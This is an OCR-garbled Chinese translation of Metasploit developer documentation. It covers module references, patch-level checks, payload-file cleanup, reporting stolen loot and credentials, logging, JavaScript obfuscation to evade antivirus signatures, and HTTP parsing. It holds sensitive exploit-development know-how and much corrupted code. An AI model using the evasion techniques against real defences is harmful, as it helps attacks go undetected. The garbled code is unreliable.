支持 的 参考 标识 符 列 表 


US-CERT-VU 
ZDI 

WPVDB 
PACKETSTORM 
URL 

AKA 


Source 
cvedetails.com 
cwe.mitre.org 
securityfocus.com 
technet.microsoft.com 
exploit-db.com 
kb.cert.org 
zerodayinitiative.com 
wpvulndb.com 
packetstormsecurity.com 
anything 
anything 


在 模块 中 引用 的 示例 


['CVE', 
['CWE', 
['BID', 
['MSB', 


['EDB', 


Code Example 


'2014-9999'] 
'90'] 
'1234'] 
'MS13-055'] 


sage 


['US-CERT-VU', '800113'] 


pop 


oou 


['wPVDB', '7615'] 


['PACKETSTORM', '132721'] 


LURE 


['AKA', 


'http://example.com/blog.php?id: 


'shellshock'] 


Home 


require mst/Cone, 


class 


MetasploitModule < Msf::Exploit: :Remote 


Rank = NormalRanking 


def initialize(info={}) 
super (update_info(info, 


end 


def 


' Name ' => "Code Example", 
'Description' => %q{ 
This is an example of a module using references 
i 
"License" => MSF_LICENSE, 
' Author ' => [ 'Unknown' ], 
"References" => 
[ 'CVE', '2014-9999' ], 
BIDE "1234" ], 
['URL', 'http://example.com/blog.php?id-123'] 
], 
'Platform' => 'win', 
'Targets' => 
[ 'Example', { 'Ret' => 0x41414141 } ] 
], 
'Payload' => 
'BadChars' => "\x00" 
, 
'Privileged' -» false, 


'DisclosureDate' => "Apr 1 2014", 
'DefaultTarget' => 0)) 


exploit 


print debug('Hello, world') 


end 


end 


63 


怎么 在 你 的 exploit 中 确认 window 补 丁 程序 级 别 


检查 补丁 级 别 是 脆弱 性 研究 或 开发 exploit 的 重要 任务 。 作 为 一 个 寻找 bug 的 人 ， 你 应 该 关心 补 
丁 级 别 ， 因 为 假设 你 有 一 个 针对 Internet Explorer 10 的 0day， 你 不 能 总 是 假定 它 自首 次 亮相 
*2012 年 ) 以 来 就 会 影响 所 有 IE 10 的 构建 。 如 果 你 意识 到 你 的 0day 只 影响 一 两 个 版 本 ， 那 么 它 
有 多 大 的 威胁 呢 ? 大 概 没 有 你 想象 的 那么 糟糕 。 如 果 您 是 exploit 开 发 人 员 ， 则 需要 检查 其 他 
原因 :最 大 可 靠 性 。 您 的 漏洞 利用 有 很 多 可 能 会 失败 ， 由 于 系统 更 新 而 更 改 的 错误 小 工具 
(ROP) 很 容易 就 是 其 中 之 一 。 如 果 这 个 更 新 发 生 在 一 个 相当 早 的 阶段 ， 你 的 漏洞 很 可 能 会 很 多 
失败 。 


如 何 收集 微软 补丁 


如 果 你 使 用 补丁 差异 ,你 可 能 会 维护 自己 的 DLL 数 据 库 。 但 是 这 可 能 需要 大 量 的 磁盘 空间 ， 对 
于 大 多 数 人 来 说 ， 这 可 能 是 不 值得 的 ， 除 非 你 每 天 都 要 看 这 些 DLL. 可 能 有 一 个 更 经 济 方法 来 
跟踪 所 有 这 些 补丁 ， 并 有 一 些 接口 允许 快速 和 方便 地 访问 它们 。 的 是 ，Microsoft 维 护 一 
个 Excel 文 件 中 的 所 有 补丁 列表 ， 您 可 以 在 这 里 下 载 : http://www.microsoft.com/en- 
us/download/confirmation.aspx?id=36982 如 果 您 更 喜欢 某 种 GUI 进行 搜索 ， 则 可 以 使 用 安全 
技术 中 心 的 My Security Bulletins Dashboard. 您 可 以 编辑 这 个 仪表 板 来 添加 特定 的 过 滤器 ,如 
Windows 版 本 ,Internet Explorer 版 本 ,Office 等 等 例如 ， 如 果 我 想 从 Windows 7 自首 次 亮相 以 来 
找到 所 有 适用 于 Windows 7 的 Internet Explorer 10 修 补 程序 ， 则 可 以 添加 以 下 过 滤器 


e Windows 7 
e |nternet Explorer 


然后 我 从 2012 年 9 月 到 2014 年 ,我 得 到 :22 个 结果 .但 是 ,当然 ,这 个 数字 会 上 升 ,因为 IE 10405 KX 
持 . 还 有 其 他 桌面 或 命令 行 工 具 ,将 基本 上 检查 您 的 Windows 系 统 丢失 的 补丁 ,如 Windows 
Update Powershell Module, 在 一 些 情况 下 它 可 能 工作 的 更 好 


补丁 提取 


e 昌 的 补丁 过 去 被 封装 成 EXE， 这 种 类 型 可 以 通过 使 用 解压 缩 工具 (如 7Zz) 来 提取 .例如 
Internet Explorer 6 修补 程序 可 以 通过 这 种 方式 提取 。 

e dT 2 d 的 修补 程序 支持 用 于 提取 的 / X 标 志 。 例 如 ， 以 下 将 在 同一 目录 下 提取 
补丁 。 可 以 通过 这 种 方式 提取 Internet Explorer 8(xp) 等 修补 程序 。 


Windows [Something]-KB[Something]-x86-ENU.exe /X:. 


© 现在 大 多 数 补 丁 都 被 打包 成 MSU。 这 是 你 必须 做 的 : 
e. 将 所 有 * .msu 文 件 放 在 同一 目录 下 (在 window 中 ) 
e 运行 tools/extract_msu.bat [*.msu 文 件 的 绝对 路 径 ] 


e extract msu.bat 应 该 自动 提取 所 有 * .msu 文 件 。 每 个 新 文件 夹 中 的 “extracted” 子 目录 都 是 
您 可 以 找到 更 新 组 件 的 地 方 


检查 修补 程序 中 的 小 工具 


通过 使 用 Metasploit 的 msfpescan 实 用 程序 (或 者 msfbinscan, 它 足够 聪明 以 知道 PE 格式 ) 是 来 
检查 不 同 修补 程序 中 小 工具 的 最 快 方法 。 这 很 容易 ， 你 只 需 把 DLL 放 在 同一 个 目录 下 ,然后 执 
行 : 


$ ./msfbinscan -D -a [address] -A 10 /patches/*.dll 


那么 这 个 工具 会 反 汇 编 那个 目录 下 的 所 有 DLL ， 在 那个 特定 的 地 址 上 是 10 个 字 节 。 您 可 能 忆 
以 稍微 自动 化 一 下 ， 以 便 快 速 确定 哪些 DLL 没有 正确 的 小 工具 ， 如 果 这 是 您 的 情况 ， 那 意味 着 
您 使 用 的 小 工具 是 不 安全 的 。 你 应 该 找到 另 一 个 更 可 靠 的 。 


如 何 使 用 filedropper 清 理 文件 
在 某 些 exploit 场 景 中 ， 例 如 本 地 特权 升级 ， 命 令 执行 ， 写 入 权限 攻击 ，SQL 注 入 等 ， 很 有 可 能 
必须 上 传 一 个 或 多 个 恶意 文件 才能 获得 目标 机 器 的 控制 权 。 那 么 聪明 的 攻击 者 不 应 该 放任 何 


东西 ， 所 以 如 果 一 个 模块 需要 在 文件 系统 上 放 一 些 东 西 ， 那 么 在 目标 服务 之 后 立即 删除 它 是 
很 重要 的 。 这 就 是 为 什么 我 们 创建 了 FileDropper mixin 。 


1A 


FileDropper mixin 是 一 个 文件 管理 器 ， 允 许 您 跟踪 文件 ， 然 后 在 创建 会 话 时 将 其 删除 。 要 使 用 
它 ， 首 先 要 包含 mixin : 


include Msf::Exploit::FileDropper 


>F RK > HA register file for cleanup 方法 创建 一 个 会 话 之 后 ， 告 诉 FileDropper 
mixin 文 件 将 在 哪里 。 每 个 文件 名 都 应 该 是 完整 路 径 ， 或 相对 于 当前 的 会 话 工 作 目 录 。 例 如 ， 
如 果 我 想 要 将 有 效 负载 上 载 到 目标 机 器 的 远程 路 径 C:\Windows\System32\payload.exe， 那 么 
我 的 声明 可 以 是 : 

register file for cleanup("C:NNWWindowsNNSystem32NNpayload.exe") 
如 果 我 的 会 话 的 当前 目录 已 经 在 C:\Windows\System\ 那 么 我 可 以 简单 地 做 : 

register file for cleanup("payload.exe") 


如 果 你 想 注 册 多 个 文件 ， 你 也 可 以 提供 文件 名 作为 参数 : 


register file for cleanup("file 1.vbs", "file 2.exe", "file 1.conf") 


HE ^ do RE AY Uh A FARE Mlon_new_session > 7&3: Fs. E & f FileDropper#) 
on new session ° 


7 n XL 
4a s] A JF] Metasploit +k 
Metasploit 有 一 个 非常 具体 的 方式 来 弃 用 一 个 模块 。 为 此 ， 您 必须 使 用 
Msf::Module::Deprecated mixin. 你 必须 使 用 这 个 mixin 有 两 个 原因 


1， 您 需要 设置 弃 用 日 期 。 这 样 我 们 知道 什么 时 候 删 除 它 ， 这 是 手动 完成 的 
2， 您 需要 设置 您 希望 弃 用 的 模块 的 蔡 代 品 


示例 
使 用 Msf::Module::Deprecated ， 这 是 如 何 操作 


1. 在 您 的 模块 class metasploit3 F ° 包含 以 下 内 容 


包括 Msf :: Module :: Deprecated 


2. a: 使 用 deprecated 方法 分 配 弃 用 日 期 和 替换 模块 
deprecated(Date.new(2014, 9, 21), 'exploit/linux/http/dlink upnp exec noauth') b: 可 
VA A x 3LDEPRECATION DATEZeDEPRECATION REPLACEMENT € € 4 4X 


DEPRECATION DATE = Date.new(2014, 9, 21) # Sep 21 
# The new module is exploit/linux/http/dlink upnp exec noauth 
DEPRECATION REPLACEMENT - 'exploit/linux/http/dlink upnp exec noauth' 


这 样 当 用 户 载 入 模块 时 他 们 应 该 就 会 看 到 这 样 的 警告 `… msf > use 
exploit/windows/misc/test 


[!] **[!] The module windows/misc/test is deprecated! [!] It will be removed on or about 2014- 
09-21 [!] Use exploit/linux/http/dlink upnp exec noauth instead [!] ** 


HHH 代码 示例 


require 'msf/core' 

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking 
include Msf::Module::Deprecated 

deprecated(Date.new(2014, 9, 21), 'exploit/linux/http/dlink_upnp_exec_noauth’') 


def initialize(info = ()) super(update info(info, 'Name' => 'Msf::Module::Deprecated Example’, 


‘Description’ => %q{ This shows how to use Msf::Module::Deprecated. }, 'Author' => [ 'sinn3r 
], ‘License’ => MSF LICENSE, 'References' => [ [ 'URL', 'http://metasploit.com' ] ], 


'DisclosureDate' => 'Apr 01 2014', 'Targets' => [ [ ‘Automatic’, { } ] ], 'DefaultTarget' => 0 )) 
end 


def exploit print debug("Code example") end 


end `` 


如 何在 模块 开发 中 报告 或 储存 数据 


store loot() -用 于 存储 被 资 文件 (包括 文本 和 二 进 制 文件 ) 和 例如 ifconfig 和 ps -ef 的 
屏幕 捕获 .这 个 文件 不 需要 取证 级 别 的 完整 .它们 可 能 被 post 模 块 解析 为 渗透 测试 者 提取 相 
关 信 息 。 

report_auth_info -储存 可 以 立刻 被 另 一 个 模块 重用 的 凭证 .例如 ,导出 本 地 SMB 哈 硕 的 模 
块 将 使 用 它 . 就 像 从 一 个 特定 的 主机 或 者 服务 读 取 用 户 名 和 密码 一 样 

report_vuln() -执行 特定 漏洞 的 辅助 和 post 模 块 应 该 在 成 功 时 返回 report_vuln(). 请 注 

意 ,exploit 模 块 自 动 将 report_vuln() 作 为 打开 会 话 的 一 部 分 (不 需要 特别 调用 它 ) 

report note() - 当 上 面 的 更 合适 时 应 该 避免 使 用 它 .但 是 通常 情况 

下 “loot” 或 “cred” 或 “vuln” 分 类 并 不 适合 .report_note() 调 用 应 始终 设置 一 个 OID 风 格 的 点 类 
型 ， 例 如 domain.hosts， 这 样 其 他 模块 可 EUH AR Rd ° 

report host() -报告 主机 活跃 和 属性 .如 操作 系统 和 Service Pack. 这 是 不 常见 的 ,因为 其 他 
报告 方法 已 经 做 到 这 一 点 .例如 report_service, report exploit success, Eom client, 
report note, report host tag, report vuln, report event, report loot. 尽 量 不 要 使 用 它 
report service() -报告 你 的 模块 检测 到 的 服务 (端口 ) 

report web page() -如 果 你 的 模块 发 现 了 一 个 看 起 来 很 有 趣 的 网 页 ,你 可 以 使 用 它 
report web form() -如 果 你 的 模块 发 现 了 一 个 看 起 来 很 有 趣 的 表单 ,你 可 以 使 用 它 
report web vuln() -报告 web 漏 洞 .exploit 模 块 不 需要 使 用 它 . 它 更 适合 辅助 模块 确认 是 一 
个 漏洞 后 利用 

report loot() -很 少 情况 下 ， 模 块 可 能 实际 上 想 要 在 不 使 用 store_loot() 下 导出 库 . 通 常 
他 们 使 用 Ruby 的 文件 ID 执行 此 操作 ， 但 是 这 不 会 被 记录 在 数据 库 中 ,因此 Metasploit 
Framework 无 法 跟踪 ,在 这 种 情况 下 ,需要 一 个 report loot() .是 ， 你 在 99.9% 的 时 间 应 该 
使 用 store_loot() ° 


考 


在 metasploit 如 何 使 用 日 志 


通常 ， 如 果 Metasploit 中 的 一 些 东 西 触发 错误 ， 那 么 会 有 一 个 回溯 或 者 至 少 一 个 简短 的 信息 来 
解释 问题 所 在 。 大 多 数 时 候 ， 这 没有 什么 不 妥 。 但 有 时 候 ， 如 果 你 想 报告 这 个 问题 ， 你 可 能 

会 失去 这 些 信息 ， 这 会 使 得 你 的 bug 报 告 信息 量 减 少 ， 而 且 这 个 问题 可 能 需要 更 长 时 间 才 能 解 
决 。 这 就 是 为 什么 在 很 多 情况 下 log 文 件 是 非常 有 用 的 。 在 本 文档 中 ， 我 们 将 解释 如 何 正确 利 
用 这 一 点 。 


基本 例子 


作为 用 户 ， 您 应 该 知道 所 有 记录 的 错误 都 保存 在 名 为 ffamework.log 的 文件 中 。 保存 路 径 在 
Msf::Config.log directory 中 定义 ,这 意味 着 在 msfconsole 中 ， 可 以 切换 到 irb 并 找 出 它 的 位 置 
msf > irb 
[*] Starting IRB shell... 


>> Msf::Config.log directory 
=> "/Users/test/.msf4/logs" 


在 默认 情况 下 log 的 等 级 为 0. 最 少 的 信息 级 别 .但 是 当然 ,你 可 以 设置 数据 存储 选项 来 更 改 此 设 
置 ,就 像 


msf > setg LogLevel 3 
LogLevel -» 3 
msf » 


log 等 级 


在 log/rex/constants.rb 有 4 个 不 同 的 log 等 级 定义 


Log 
Level 


LEV 0 
(Default) 


BEEN 
(Extra) 


LEV 2 
(Verbose) 


LEV_3 
(Insanity) 


描述 


如 果 没 有 指定 时 的 默认 日 志 级 别 ,当局 用 日 志 记 录 时 应 始终 显示 日 志 消 息 时 
使 用 它 .除了 必要 的 信息 记录 和 错误 /警告 记录 之 外 ， 在 这 个 级 别 上 应 该 发 生 
很 少 的 日 志 消息 。 不 建议 在 零 级 日 志 记录 进行 调试 。 


当 需 要 额外 的 信息 来 理解 错误 或 者 警告 信息 的 原因 ， 或 者 得 到 调试 信息 ， 这 
些 信 息 可 能 会 提供 关于 发 生 某 些 事情 的 线索 时 ， 应 该 使 用 这 个 日 志 级 别 。 这 
个 日 志 级 别 只 有 在 信息 可 以 用 来 理解 基本 级 别 的 行为 时 才能 使 用 。 这 个 日 志 
级 别 不 应 该 以 详尽 的 宛 长 的 方式 使 用 。 


当 需 要 详细 信息 来 分 析 框 架 的 行为 时 ， 应 使 用 此 日 志 级 别 。 这 应 该 是 不 属于 
LEV_0 或 LEV_1 的 所 有 详细 信息 的 默认 日 志 级 别 。 如 果 您 不 确定 ， 建 议 您 默 
认 使 用 此 日 志 级 别 。 


这 个 日 志 级 别 应 该 包含 关于 框架 行为 的 非常 详细 的 信息 ， 比 如 关于 某 些 阶段 


的 变量 状态 的 详细 信息 ， 包 括 但 不 限于 循环 和 迭代， 函数 调用 等 等 。 这 个 日 志 
级 别 很 少 会 显示 ， 但 是 当 它 提供 的 信息 应 该 可 以 很 容易 地 分 析 任何 问题 。 


出 于 调试 的 目的 ， 最 好 打开 最 高 级 别 的 日 志 记 录 


logging api 


主要 有 5 种 你 将 


会 很 可 能 经 常 使 用 的 log 方 法 .他 们 都 有 完全 相同 的 参数 .让 我 们 使 用 其 中 一 个 日 


志 记 录 方 法 来 解释 这 些 参数 是 干什么 的 


def elog(msg, src = 'core', level = 0, from = caller) 


msg: 你 想 要 记录 的 信息 


e src; 这 个 错误 的 来 源 ( 默 认 core, 来 自 metasploit core) 
e level: 这 个 日 志 的 记录 


dlog() 
elog() 
wlog() 
ilog() 


rlog() 


代码 例子 


from: 当 前 执行 堆栈 caller 是 Kernel 的 一 个 方法 


Method Purpose 


LOG DEBUG 
LOG ERROR 
LOG WARN 
LOG INFO 
LOG RAW 


elog("The sky has fallen") 


Home 


72 
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隐藏 是 在 开发 过 程 中 考虑 的 一 个 重要 特点 .如 果 你 的 exploit 永 远 被 抓 住 .那么 这 和 你 的 exploit 多 
棒 或 者 多 么 有 技术 挑战 是 不 重要 的 .在 丨 正 的 渗透 测试 中 ， 它 很 可 能 不 是 很 有 用 。 特别 是 浏览 
器 漏洞 ,主要 依靠 JavaScript 来 触发 漏洞 ,因此 许多 基于 防 病毒 或 基于 特征 的 入 侵 检测 /防御 系统 
将 扫描 JavaScript 并 将 特定 行 标记 为 恶意 代码 .以 下 代码 曾 被 多 个 防 病毒 软件 供应 商 视 为 MS12- 
063， 即 使 这 些 代码 不 一 定 有 害 或 恶意 ， 我 们 将 在 整个 wiki 上 使 用 它 作为 示例 : 


var arrr = new Array(); 
arrr[0] - windows.document.createElement("img"); 
arrr[O]["sre"] = "a"; 


为 了 避免 被 标记 ,我 们 可 以 尝试 一 些 常见 的 躲避 技巧 .例如 ,您 可 以 手动 修改 代码 ,使 其 不 能 被 任 
何 签名 识别 .或 者 ， 如 果 防 病毒 软件 依靠 缓存 的 网 页 来 扫描 漏洞 ， 则 可 能 导致 浏览 器 不 缓存 你 


的 漏洞 网 页 ， 以 避免 漏洞 检查 。 或 者 在 这 种 情况 下 ,你 可 以 混淆 你 的 代码 ， 这 是 这 篇 文章 的 重 
点 。 


在 Metasploit 中 ， 有 三 种 常见 的 方法 来 混淆 你 的 JavaScript。 第 一 个 是 简单 地 使 用 
rand text alpha 方法 〈 在 Rex) 随机 化 你 的 变量 。 第 二 个 是 使 用 DObfuscateJS 类 。 第 三 个 选项 
是 JSObfu 类 。 


rand text alpha 技巧 


使 用 rand text alpha 是 最 基本 的 逃避 技巧 .但 也 是 最 没有 效 的 。 如 果 这 是 你 的 选择 ， 你 应 该 随 
机 化 任何 可 以 随机 化 ， 而 不 会 破坏 代码 。 通过 使 用 上 面 的 MS12-063， 你 将 学 会 如 何 使 用 
rand_text_alpha 


# Randomizes the array variable 
# Max size = 6, Min = 3 
var array = rand text alpha(rand(6) + 3) 


# Randomizes the src value 
val src = rand text alpha(1) 


js = %Q| 

var #{var_array} = new Array(); 

#{var_array}[0] = windows.document.createElement ("img"); 
#{var_array}[0]["src"] = "#{val_src}"; 

| 


ObfuscateJS # 


ObfuscateJS X 3t/& rand text alpha, 但 更 好 。 它 允许 您 替换 符号 名 称 ， 如 变量 ， 方 法 ， 类 和 
名 称 空间 。 它 也 可 以 通过 随机 使 用 romCharCode 或 unescape 来 混淆 字符 串 . 最 后 ， 它 可 以 去 
掉 JavaScript 注 释 ， 这 是 非常 方便 的 ， 因 为 漏洞 经 常 难以 理解 和 阅读 ， 所 以 您 需要 注释 来 记 住 


ACA REVUE RC MEA AA XR Ro CLMABRAGEP ERARE E A 为 了 使 用 
ObfuscateJS， 我 们 再 次 使 用 MS12-063 的 例子 来 演示 。 如 果 你 觉得 自己 不 用 编写 模块 就 可 以 
自己 完成 这 个 步骤 ， 你 可 以 做 的 就 是 继续 运行 msfconsole， 然 后 切换 到 irb， 如 下 所 示 : 


$ ./msfconsole -q 
msf » irb 
[*] Starting IRB shell... 


>> 


你 准备 好 后 .你 使 用 ObfuscateJS 做 的 第 一 件 事 是 你 需要 用 你 想 混淆 的 JavaScript 来 初始 化 它 ， 
所 以 在 这 种 情况 下 ， 就 像 下 面 这 样 开始 : 


js = %Q| 

var arrr = new Array(); 

arrr[0] = windows.document.createElement("img"); 
arrr[O]["sre"] = "a"; 


obfu = ::Rex::Exploitation::ObfuscateJS.new(js) 


obfu E 1K Æ — 434 I 49 Rex::Exploitation::ObfuscateJS 4 -. È AMAR BUR S Sly ART VA BE 
的 调用 方法 ,或 者 查看 源 代码 ， 看 看 有 什么 方法 可 用 (附加 的 API 文 档 )。 但 是 为 了 演示 目的 ， 我 
们 将 展示 最 常用 的 一 个 : obfuscate 方 法 。 


要 实际 混淆 ,您 需要 调用 该 obfuscate 方 法 .这 个 方法 接受 一 个 符号 参数 , 它 允 许 你 手动 指定 要 混 
消 的 符号 名 (变量 ,方法 ,类 等 等 ), 它 应 该 像 下 面 这 样 


{ 

'Variables' => [ 'vari', ... ], 

'Methods' => [ 'methodi', ... ], 

"Namespaces' => [ 'n', ... ], 

'Classes' => [ { 'Namespace' => 'n', 'Class' => 'y'}, ... ] 
} 


所 以 ， 如 果 我 想 混淆 变量 arrr， 我 想 混淆 src 字 符 串 ， 这 是 怎么 做 


>> obfu.obfuscate('Symbols' => {'Variables'=>['arrr']}, 'Strings' => true) 

=> "\nvar QqLFS = new Array();NnQqLFS[0] = windows.document.createElement (unescape(Str 
ing.fromCharCode( 37, 54, 071, 045, 0x36, 0144, 37, 066, 067 )));\nQqLFS[0][String. fr 
omCharCode( 115, 0x72, 0143 )] = unescape(String.fromCharCode( 045, 0x36, 0x31 ));\n 


在 某 些 情况 下 ， 您 实际 上 可 能 想 知 道 符 号 名 称 的 混淆 版 本 。 一 种 情况 是 从 元 素 的 事件 处 理 程 
序 调用 JavaScript 函 数 ， 例 如 


«html» 

«head» 

«script» 

function test() { 
alert("hello, world!"); 


</script> 

</head> 

<body onload="test();"> 
</body> 

</html> 


混淆 的 版 本 如 下 所 示 


js = %Q| 

function test() { 
alert("hello, world!"); 

} 


obfu = ::Rex::Exploitation::ObfuscateJS.new(js) 
obfu.obfuscate('Symbols' => {'Methods'=>['test']}, 'Strings' => true) 


html = %Q| 

<html> 

<head> 

<script> 

#{js} 

</script> 

</head> 

<body onload="#{obfu.sym('test')}();"> 
</body> 

</html> 


puts html 


JSObfu X 


JSObfu 类 曾经 是 ObfuscateJS 的 堂 兄 弟 ， 但 自 2014 年 9 月 以 来 已 经 完全 重 写 ， 并 被 封装 成 一 个 
gem 。 混 清 更 为 复杂 ， 您 实际 上 可 以 用 它 混淆 多 次 。 您 也 不 再 需要 手动 指定 要 更 改 的 符号 名 
称 ， 它 是 知道 的 。 

尝试 jsobfu 


让 我 们 再 回 到 irb 来 展示 使 用 JSObfu 是 多 么 容易 


$ ./msfconsole -q 
msf » irb 
[*] Starting IRB shell... 


>> 


这 个 时 候 我 们 尝试 hello world 的 例子 


>> js = ::Rex::Exploitation::JSObfu.new %Q|alert('hello, world!');| 
-» alert('hello, world!'); 

>> js.obfuscate 

-» nil 


它 的 输出 是 这 样 的 


window[(function () { var _d="t",y="ler",N="a"; return N+y+ d 3)()]((function () { var 
f='d!',B='orl',Q2='h',m='ello, w'; return Q2+m+B+f })()); 


像 ObfuscateJS 一 样 ， 如 果 你 需要 得 到 一 个 符号 名 称 的 随机 版 本 ， 你 仍然 可 以 这 样 做 。 我 们 将 


>> js = ::Rex::Exploitation::JSObfu.new %Q|function test() { alert("hello"); j| 
=> function test() { 

alert("hello"); 
} 


>> js.obfuscate 


如 果 我 们 想 知 道 方法 名 test 的 随机 版 本 


>> puts js.sym("test") 


很 好 ,快速 确认 一 下 


>> puts js 
function _(){window[(function () { var N="t",r="r",i="ale"; return i+r+N })()](String. 
fromCharCode(0150, 0x65, 0154, Ox6c, 0x6f)); 


我 看 起 来 很 好 ,最 后 ， 让 我 们 尝试 混淆 几 次 ， 看 看 结果 如 何 : 


>> js = ::Rex::Exploitation::JSObfu.new %Q|alert('hello, world!');| 

=> alert('hello, world!'); 

>> js.obfuscate(:iterations=>3) 

=> window[String[((function()[var s=(function () { var r="e"; return r })(),Q=(functio 
n () ( var Iz"d",dGz"o"; return dG+I })(),c=String.fromCharCode(0x66,114),w=(function 
() { var iz"C",vz"r",fz"omCh", j="a"; return f+j+v+i })();return c*w*Q*s; 3) ())](('Urx'. 
length*((0x1*(01*(1*02045)41)*43)*'u'.length«('SGgdrAJ'.length-7))-*(('Iac'.length* 'XLR' 
.Length+2)*'qm'.length+0)),(('1'.length*((function () ( var vZ='k'; return vZ 3)()[((f 
unction () { var E="h",t="t",0="leng"; return O+t+E })())]*(0x12*1+0)+'xE'.length)+'h' 
.length)*(function () { var Z='uA', J='tR',D='x'; return D+J+Z })()[((function () { var 
m="th",o="g",U="1",Y="en"; return U+Y+o+m })())]+'lbLc'.length), ('mQ'.length* (02*023+2 
)*('Tt'.length*'OEzGiMVf'.length-*5)), (String. fromCharCode(0x48,0131)[((function () {v 
ar i-"gth",rz"len"; return r+i })())]*('E'.length*0x21+19)+(0x1* 'XlhgGJ'.length+4)),(S 
tring. fromCharCode(0x69)[((function () { var L="th",Q="n",$="1",I="g",x="e"; return $+ 
X+Q+I+L })())]*('QC'.Length*0x2b+3)+(01*26+1)))]((function(){var C=String[((function ( 
) { var w="rCode", jz"mCha",Az"fr",Bz"o"; return A+B+j+w })())]((6*0x10+15), ('riHey'.le 
ngth*('NHnex'.length*0x4+2)+4), (01*95+13), (1*('Z'.length* (0x1* (01* (0x3*6+5)+1)+18)+12) 
+46), (Ox1* (01*013+6)+16)), IQ=String[((function () { var NO="ode", T="rC",HT="fromCha"; 
return HT+T+NO })())](('J'.length*0x54+17), (0x2*051+26), ('TFJAGR'.length*('ymYaSJtR'.1 
ength* 'gv'.length+0)+12), (01*0155+2), (Oxe*'FBc'.length+2), (0x1*22+10), (3*(01*043+1)+11 
)),g=(function(){var N=(function () { var sz'h'; return s })();return N;})();return g+ 


J0*0;3)()); 


使 用 jsbofu 进 行 模块 开发 


当 你 正在 编写 一 个 模块 时 ， 你 不 应 该 像 上 面 的 例子 那样 直接 调用 Rex。 相 反 ， 你 应 该 使 用 
JSObfu mixin 中 的 芍 s_obfuscate 方 法 。 当 你 在 你 的 模块 中 使 用 JavaScript 时 ， 一 定 要 这 样 写 : 


# This returns a Rex::Exploitation::JSObfu object 
js = js obfuscate(your code) 


本 文档 讨论 如 何以 最 简洁 的 方式 解析 HTTP 响 应 主体 . 


得 到 一 个 响应 

要 获得 响应 ， 您 可 以 使 用 Rex::Proto::Http::Client, 或 the HttpClient mixin 来 生成 一 个 http 请 求 . 
如 果 你 正在 编写 一 个 模块 ， 你 应 该 使 用 mixin 以 下 是 使 用 HttpClient 中 的 #send_request _cgi 方 
法 的 示例 : 


res = send_request_cgi({'uri'=>'/index.php'}) 


i& ©) fires — ^ Rex::Proto::Http: Response 对 象 ， 但 是 也 可 能 由 于 连接 /响应 超时 而 得 到 一 
个 NilClass ° 


得 到 一 个 响应 主体 

一 个 Rex::Proto::Http::Response 对 象 ,下 面 是 如 何 检索 HTTP 正 文 
data = res.body 

如 果 你 想 获得 原始 的 http 响 应 (包括 响应 信息 ,代码 , 头 ,主体 ). 你 可 以 简单 的 
raw res = res.to s 

但 是 在 这 个 文档 ,我 们 只 关注 主体 


选择 正确 的 解析 器 


格式 解析 器 
HTML Nokogiri 
XML Nokogiri 
JSON JSON 


如 果 您 需要 解析 的 格式 不 在 列表 中 ， 则 返回 res.body 


用 Nokogiri 解 析 HTML 


当 你 有 一 个 Rex::Proto::Http::Response 的 时 候 ， 调 用 的 方法 是 : 


html = res.get html document 


这 会 给 你 一 个 Nokogiri::HTML::Document, 它 将 允许 你 使 用 Nokogiri api Nokogiri 有 两 种 常用 
方法 来 查找 元 素 : #at 和 #search。 主 要 区 别 是 #at 方 法 将 只 返回 第 一 个 结果 ， 而 #search 将 返 


所 有 找到 的 结果 (在 一 个 数组 中 ) 。 
考虑 下 面 的 例子 作为 你 的 HTML 响 应 : 


«html» 
«head» 
<title>Hello, World!«/title» 
</head> 
<body> 
<div class="greetings"> 
<div id="english">Hello</div> 
<div id="spanish">Hola</div> 
«div id="french">Bonjour</div> 
</div> 
</body> 
<html> 


#at 的 基本 例子 
如 果 使 用 #at 方 法 来 查找 DIV 元 素 


html = res.get html document 
greeting - html.at (' div ') 


然后 ，greeting 变 量 应 该 是 一 个 Nokogiri::XML::Element 对 和 象 ， 它 给 了 我 们 这 
#at 方 法 只 返回 第 一 个 结果 ) 


<div class="greetings"> 

<div id="english">Hello</div> 
<div id="spanish">Hola</div> 
<div id="french">Bonjour</div> 
</div> 


从 特定 元 素 树 中 抓 取 元 素 


html = res.get html document 
greeting - html.at('div//div') 


然后 ， 该 greeting 变 量 应 该 给 我 们 这 个 HTML 块 : 
«div id="english">Hello</div> 
抓 取 具有 特定 属性 的 元 素 
例如 我 们 不 想 要 美文 的 ,我 们 想 要 西班牙 语 的 . 那 我 们 可 以 这 样 做 


html = res.get html document 
greeting = html.at('div[Qid-"spanish"]!') 


个 HTML 块 (因为 


抓 取 具 有 特定 文本 的 元 素 


假设 我 只 知道 有 一 个 DIV 元 素 说 “Bonjour”， 我 想 抓 住 它 ， 然 后 我 可 以 这 样 做 : 


html = res.get html document 
greeting - html.at('//div[contains(text(), "Bonjour")]') 


或 者 让 我 们 说 ， 我 不 知道 "Bonjour 这 个 词 是 什么 元 素 ， 那 么 我 可 以 对 此 有 点 模糊 


html = res.get html document 
greeting = html.at('[text()*-"Bonjour"]') 


#search 的 基本 用 法 


search 方 法 返回 一 个 元 素数 组 o 假设 我 们 想 要 找到 
所 有 的 DIV 元 素 ， 那 么 这 里 是 怎么 做 


html 
divs 


res.get html document 
html.search('div') 


获取 文本 
当 你 有 一 个 元 素 时 ， 你 总 是 可 以 调用 帮 ext 方 法 来 获取 文本 。 例 如 


html = res.get html document 
greeting - html.at('[text()*-"Bonjour"]') 
print status(greeting.text) 
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text 方 法 也 可 以 被 用 作 去 除 所 有 HTML 标 


html = res.get html document 
print line(html.text) 


以 上 将 输出 : 


"\n\nHello, World!NnNnNnNnHelloNnHolaNnBonjourNnNnNn" 
如 果 你 是 想 保留 HTML 标 签 ， 那 么 不 要 调用 检 ext， 而 是 调用 ##inner_html。 


访问 属性 


使 用 一 个 元 素 ， 只 需 调 用 #attributes 即 可 。 


domi 

使 用 加 ext 方 法 转 到 下 一 个 元 素 。 

使 用 #previous 方 法 回 到 前 一 个 元 素 。 

使 用 #parent 方 法 来 查找 父 元 素 。 

使 用 #children 方 法 获取 所 有 的 子 元 素 。 

使 用 失 raverse 方 法 进行 复杂 的 解析 。 

解析 Xml 

要 从 Rex::Proto::Http::Response 获 取 XML 正 文 ， 请 执行 


xml = res.get xml document 
其 余 的 应 该 和 解析 HTML 非 常 相 似 。 


解析 json 
要 从 Rex::Proto::Http::Response 获 取 json 正 文 ， 请 执行 


json = res.get json document 


如 何 使 用 HTTPClient 发 送 HTTP 请 求 


